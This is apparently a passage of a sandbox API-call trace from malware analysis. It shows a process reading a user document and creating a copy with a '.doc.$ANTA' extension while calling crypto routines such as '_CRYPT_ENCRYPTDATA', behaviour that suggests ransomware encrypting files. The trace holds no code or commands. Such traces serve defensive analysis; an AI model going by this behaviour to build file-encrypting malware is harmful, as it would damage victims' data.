hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.662] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\ej z0zccpmn.doc.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.666] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.666] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0xd46d, lpOverlapped=0x0) returned 1 [0076.668] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.675] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.675] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.675] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0076.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0076.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.677] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0076.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797108 [0076.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0076.680] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2710, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2710*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0076.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0076.683] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0076.685] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 